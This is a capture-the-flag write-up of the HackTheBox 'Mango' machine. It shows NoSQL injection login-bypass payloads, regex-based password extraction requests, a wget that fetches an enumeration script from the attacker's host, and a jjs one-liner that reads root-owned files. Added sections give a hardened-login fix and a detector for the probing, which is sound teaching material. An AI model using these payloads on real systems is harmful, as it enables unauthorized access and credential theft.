HacktheBox.eu - Retired - Mango
Recon
As always I start with a simple up/down scan on all TCP ports
nmap -T4 -p- -oX ./nmapb.xml 10.10.10.162
Then I convert that to HTML
# xsltproc ./nmapb.xml -o ./nmapb.html
Looks like port 22, 80 and 443 are open.
Let's scan again with -A to fingerprint the OS and services
# nmap -T4 -A -p 22,80,443 -oX ./nmapf.xml 10.10.10.162
Then convert it to HTML again
# xsltproc ./nmapf.xml -o nmapf.html
Ok so port 22 is SSH, and ports 80 and 443 are Apache 2.4.29
Here is what we see on 443
Dirbuster found this
This is one of the first boxes I've done that actually required messing with my hosts file
So if you look at the certificate for the site
I added staging-order.mango.htb to my /etc/hosts file and now we see
Let's dirbuster this bad boy and see if we can find anything else
During the scan it found this folder /vendor/composer/
Which is a dependency manager for PHP
Usually there is an installed.json file in that directory, according to the documentation
Let's see..
Yup, and look there, MongoDB. I think this is where the box draws the name Mango from.
Exploit
This site gives us some things to try to bypass auth
I caught the login in Burp Suite, sent it to Repeater and added
username[$ne]=toto&password[$ne]=toto&login=login
Which redirects us to
So the auth bypass worked and got us to this new home.php page
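To show what that bypass actually relies on, here is an added example that is not code from the original writeup or from the Mango box. It reimplements in Python the part PHP does for free: `field[key]=value` form parameters become nested arrays, so `password[$ne]=toto` arrives at the database as an operator document. The user record, the parser and the tiny `$ne`/`$regex` matcher are constructed stand-ins for PHP and MongoDB; `hardened_login` is the input check that closes the hole.

```python
"""Added example, not code from the original writeup or from the Mango box.
PHP-style form parsing turns `password[$ne]=toto` into an operator document
that a MongoDB driver would happily evaluate. The user record, the parser and
the operator matcher are constructed stand-ins; `hardened_login` shows the
input check that refuses operator injection."""
import hmac
import re
from urllib.parse import parse_qsl

# Constructed sample record. The $regex probes in the writeup only work because
# the password is stored in clear, so storage itself is part of the problem.
USERS = [{"username": "admin", "password": "t9KcS3>!0B#2"}]


def php_parse_body(body):
    """Mimic PHP's $_POST: `field[key]=v` becomes {'field': {'key': 'v'}}."""
    params = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = re.fullmatch(r"([^\[]+)\[([^\]]*)\]", key)
        if m:
            params.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            params[key] = value
    return params


def mongo_match(field_value, criterion):
    """Stand-in for the two MongoDB operators the writeup abuses."""
    if not isinstance(criterion, dict):
        return field_value == criterion  # plain string equality
    for op, arg in criterion.items():
        if op == "$ne":
            if field_value == arg:
                return False
        elif op == "$regex":
            if re.search(arg, field_value) is None:
                return False
        else:
            raise ValueError("unsupported operator " + op)
    return True


def vulnerable_login(body):
    """Passes whatever PHP parsed straight into the query, operators included."""
    p = php_parse_body(body)
    return any(
        mongo_match(u["username"], p.get("username"))
        and mongo_match(u["password"], p.get("password"))
        for u in USERS
    )


def hardened_login(body):
    """Only scalar strings reach the lookup; `field[$op]` arrays are refused."""
    p = php_parse_body(body)
    username, password = p.get("username"), p.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        return False
    return any(
        u["username"] == username
        and hmac.compare_digest(u["password"].encode(), password.encode())
        for u in USERS
    )
```

The type check is the whole fix: once the application refuses anything that is not a plain string, neither the `$ne` bypass nor the `$regex` length and character probes later in this writeup can reach the query. Calling `vulnerable_login` with the exact `username[$ne]=toto&password[$ne]=toto` body from above returns True, the hardened version returns False for it and only accepts the real credentials.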
Found this blog post with his python script that we can use to enumerate
python nosqli-user-pass-enum.py -u http://staging-order.mango.htb/index.php -up username -pp password -ep username -op login:login -m POST
Cool got a couple of users admin & mango
I tried using this same script to get the password but no luck
Popping back over to burp we can try to start to narrow down the password
Using this POST
Let's start with finding out how long the password is
We can test the length of the password by using regex to count th
For example this will test if the password is 13 characters or longer.
If we get a redirect the expression was true, if we don't get a redirect the expression was false.
For example we get no redirect with this so the password is less than 13 characters
username=admin&password[$regex]=.{13}&login=login
But we do get a redirect with
username=admin&password[$regex]=.{12}&login=login
So the password should be 12 characters for admin
For mango, this one got a redirect
username=mango&password[$regex]=.{16}&login=login
So mango's password is 16 characters
So we can use burp to see if we get redirects on the password too
We can use regex to step through the password, once again using the redirect as a true false indicator
So if you don't know much about regex, like I didn't when I started this box, check out these resources
So one of the things about regex is that there are what are referred to as metacharacters. These are characters that have operating power in regex.
The metacharacters are ] \ ^ - and these are also normal characters in the traditional character set, so if we need to use one of them in a search we have to escape it with \ . For example, if we want to search for a \ in a text we actually need to input \\ so that the special meaning in regex is escaped and it is treated as a normal character. Escaping all the metacharacters would look like this: \\ \] \^ \-
This will be important later.
Let's take a look at one of these metacharacters, because we are going to need its special function in our search: the ^ (caret). The caret will match the starting position within a string, so it matches against the first letter.
We can also use [ ] brackets to supply a list to test against, it will attempt to match for anything inside the brackets
So the ^[1] will check to see if the first character is a 1
We can also use ranges inside the brackets like [0-9]
So ^[0-9] will check if the first character is a number, other ranges we will use are a-z and A-Z which will look for alpha characters lowercase and uppercase.
And we can stack them too
So ^[a-zA-Z0-9] will check the first character to see if it's alphanumeric or not
The next metacharacter we need to know about is the . (period), which will match anything except a line break; since the passwords won't have a line break we don't really need to worry about that part.
We can use the period in combination with curly brackets .{} to supply a character number to point our expression at.
So if we do .{12}[a-z]
This will look at the 12th character and see if it's a lower case alpha character.
Okay I think that's all you need to know to follow my logic going forward
Let me show my character sets I'm going to use to figure out what the character is
A-Z
a-z
0-9
~!@#$%*()_+{}|:"<>?=[;',./ -- its okay for some regex operators to appear in this list as long as what follows them doesn't actually do any type of logic
And also my escaped metacharacters
\]\\\^\-
Let's start with admin and see if we can figure out what the first character is
I start with a pretty broad set to narrow down what it could be
username=admin&password[$regex]=^[a-zA-Z0-9]&login=login
This will search all alpha (upper and lower) as well as numbers if this doesn't return a redirect I'll replace everything in the [ ] with my special character sets
As you can see we got the redirect option, so we know the first character is alphanumeric.
So the next step is to remove one of the ranges and see if it still evaluates as true and gives us the redirect
Here is the post data
username=admin&password[$regex]=^[a-zA-Z]&login=login
As you can see I removed the 0-9, so now it will only try to match the alpha characters
Still giving us the redirect, so it's an alpha character. Let's try to remove the capitals and see what happens
username=admin&password[$regex]=^[a-z]&login=login
Still works, so we know it's a lower case alpha character; it's just going to take some more trial and error. I'm going to divide the alpha range in half (or at least close to it)
This time I'm just going to look from a-m
username=admin&password[$regex]=^[a-m]&login=login
Ok, no redirect to follow, so the first character comes after m in the alphabet. I'll adjust to n-z to see if it evaluates true again
username=admin&password[$regex]=^[n-z]&login=login
Cool so now we will just keep narrowing down the range of lowercase alphas until we get to one that doesn't give us a redirect, so we can deduce that we have removed the correct character
Let's try n-v next
Yup that came back, so we will just keep trimming away until it doesn't, hopefully you understand the logic I'm using here by now.
Ok when we dropped down to n-s we didn't get our redirect
So since the last letter I removed was a t, I think that is the start of the admin password. Let's now try to evaluate just on a t
username=admin&password[$regex]=^[t]&login=login
Cool the first letter is a t
Let's introduce the next step to try and get the next letter.
Let's add . to our regex
You might remember the period is essentially a wild card. So we are going to say: here is ^, find the first starting character, but skip it using the period and evaluate against the next letter. So really we just check the second letter
username=admin&password[$regex]=^.[a-zA-z0-9]&login=login
Cool, we got the redirect, which means the second letter is alphanumeric. Let's strip out the numbers to see if it's alpha or numeric
username=admin&password[$regex]=^.[a-zA-z]&login=login
No redirect, so the statement is no longer true. Let's try just numbers now
username=admin&password[$regex]=^.[0-9]&login=login
Then I just used trial and error to get down to 9
The second character is a 9
username=admin&password[$regex]=^.[9]&login=login
Now we can almost finish with logic here, but I want to introduce one more regex thing
{}
Curly brackets: if we put a number inside curly brackets, we are saying match the previous thing that specific number of times
So .{4} would result in .... (4 of the wild cards), .{1} would just be one . and .{22} would be 22 periods.
So since we have the first two characters we will use the curly brackets to add more wild card characters for us.
So we will put .{2} to put in two wild cards in front of what we are matching for which is now the third letter
username=admin&password[$regex]=^.{2}[a-zA-Z0-9]&login=login
We got redirection, so it's alphanumeric
Let's take out the number again 0-9
Still redirects. Okay, so it's a letter, but is it upper or lower?
username=admin&password[$regex]=^.{2}[A-Z]&login=login
It's upper, and process of elimination got us down to K
So we move to the next character. We will need to increment our curly brackets to 3 so it will compare against the 4th character. Also we will reset our search to include a-zA-Z0-9
And just keep repeating this process until we get our password
t9KcS3>!0B#2
Eventually we got that as the admin password and now we just repeat this whole process for mango's password
h3mXK8RhU~f{]f5H
Cool we got passwords now and when we enter them on the staging-order.mango.htb page we move to the under plantation page
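Seen from the server side, the length probes and the character-by-character narrowing above are a burst of requests whose only difference is a `password[$regex]` value. Here is an added detection example, not part of the original writeup, that scans constructed application log lines recording POST bodies (Apache access logs do not carry bodies, so this assumes an application-level log in a simple `time client method path body` format I made up) for MongoDB operator keys in form fields, and flags clients that send repeated `$regex` probes as a likely extraction attempt. The client addresses and timestamps in the sample log are constructed.

```python
"""Added detection example, not part of the original writeup. Looks for
MongoDB operator keys (`field[$op]`) in logged POST bodies and flags clients
sending repeated `$regex` probes, which is what the character-by-character
password extraction looks like from the server side."""
import re
from collections import defaultdict

# `field[$op]` anywhere in a form body, capturing the operator name.
OPERATOR_KEY = re.compile(r"[A-Za-z_]+\[\$([A-Za-z]+)\]")

# Constructed log lines in an assumed "<time> <client> <method> <path> <body>" format.
SAMPLE_LOG = """\
2019-11-10T14:02:11Z 10.10.14.19 POST /index.php username=admin&password=wrong&login=login
2019-11-10T14:02:40Z 10.10.14.19 POST /index.php username[$ne]=toto&password[$ne]=toto&login=login
2019-11-10T14:05:01Z 10.10.14.19 POST /index.php username=admin&password[$regex]=.{13}&login=login
2019-11-10T14:05:02Z 10.10.14.19 POST /index.php username=admin&password[$regex]=.{12}&login=login
2019-11-10T14:05:03Z 10.10.14.19 POST /index.php username=admin&password[$regex]=^[a-zA-Z0-9]&login=login
2019-11-10T14:05:04Z 10.10.14.19 POST /index.php username=admin&password[$regex]=^[a-z]&login=login
2019-11-10T14:06:30Z 10.10.14.33 POST /index.php username=mango&password=guess&login=login
"""


def operators_in_body(body):
    """Return the list of operator names found in one request body."""
    return OPERATOR_KEY.findall(body)


def analyse(log_text, regex_threshold=3):
    """Aggregate operator use per client and classify what it looks like.

    Any operator key at all is a finding (a legitimate login form never sends
    one); at or above `regex_threshold` $regex requests from one client, the
    pattern is reported as an oracle-style extraction rather than a one-off.
    """
    per_client = defaultdict(lambda: {"operators": set(), "regex_probes": 0, "requests": 0})
    for line in log_text.splitlines():
        parts = line.split(" ", 4)
        if len(parts) < 5:
            continue  # malformed or truncated line; skip rather than crash
        _time, client, _method, _path, body = parts
        stats = per_client[client]
        stats["requests"] += 1
        ops = operators_in_body(body)
        stats["operators"].update(ops)
        stats["regex_probes"] += ops.count("regex")

    findings = {}
    for client, s in per_client.items():
        if not s["operators"]:
            continue
        verdict = "oracle-extraction" if s["regex_probes"] >= regex_threshold else "operator-injection"
        findings[client] = {
            "verdict": verdict,
            "operators": sorted(s["operators"]),
            "regex_probes": s["regex_probes"],
        }
    return findings


if __name__ == "__main__":
    for client, f in analyse(SAMPLE_LOG).items():
        print(client, f["verdict"], f["operators"], f["regex_probes"])
```

The threshold is deliberately low because there is no benign reason for a browser-submitted login form to contain `[$regex]` even once; the per-client count only distinguishes a single probe from the hundreds of requests a full extraction takes. Rejecting non-string parameters at the application, as in the earlier hardening example, is what stops the oracle; this scan is for finding out whether someone already tried.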
Now we can put away our regex and burp suite for now.
Let's see if we can SSH as mango or admin
Admin didn't work, but guess what???
Mango does!!!!
Sudo password for mango didn't work
Bummer
Let's get linenum.sh over here and see what we can see…
I wonder if i can su to admin now?
yup
Let's get the user hash since we can now
User hash
79bf***************************
Cool let's get root
Let's fire up simpleHTTPServer on our attacking box in the directory holding our LinEnum.sh
python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
On mango I navigated to the tmp directory, made a new folder for myself and used wget to download it
mango@mango:/tmp/circusmonkey$ wget http://10.10.14.19:8000/LinEnum.sh
Gave myself execute
And ran it
I found this in the output
Googling around for jjs I found some GTFOBins entries for jjs
Found this GTFOBin for reading files
echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("file_to_read"));
while ((line = br.readLine()) != null) { print(line); }' | jjs
Modified it to be /root/root.txt
And bam we got root.txt
That was quick
$ echo 'var BufferedReader = Java.type("java.io.BufferedReader");
>
> var FileReader = Java.type("java.io.FileReader");
>
> var br = new BufferedReader(new FileReader("/root/root.txt"));
>
> while ((line = br.readLine()) != null) { print(line); }' | jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> var BufferedReader = Java.type("java.io.BufferedReader");
jjs>
jjs> var FileReader = Java.type("java.io.FileReader");
jjs>
jjs> var br = new BufferedReader(new FileReader("/root/root.txt"));
jjs>
jjs> while ((line = br.readLine()) != null) { print(line); }
8a********************************
username=admin&password[$regex]=^[t]&login=login
This got a redirect so I think the first character is a t
Then we can start moving down the line
username=admin&password[$regex]=^.[abcdefghijklmnopqrtuvwxyz]&login=login
This checks if the second character is a lower case character
Nope
username=admin&password[$regex]=^.[1234567890]&login=login
This however did get a redirect so I just stepped through the numbers
Until I got to
username=admin&password[$regex]=^.[9]&login=login
A bit later I figured out I could shorten this with [0-9] which will mean it matches a number between 0 and 9
I used
0-9
a-z
A-Z
To narrow down the character as a starting point
Which means the second character is a 9
So so far we know the password for admin starts with t9
Next I found K
So t9K
Next I found c
So t9Kc
Finally I got the admin password down to
t9KcS3>!0B#2
I'm going to apply the same logic for the password for mango
First character is also ^
h3mXK8RhU~f{]f5H
POST /index.php HTTP/1.1
Host: staging-order.mango.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Connection: close
Cookie: PHPSESSID=vqvnfiib8jlurb0rkjgqabp3d0
Upgrade-Insecure-Requests: 1
username=admin&password[$regex]=^...[c]&login=login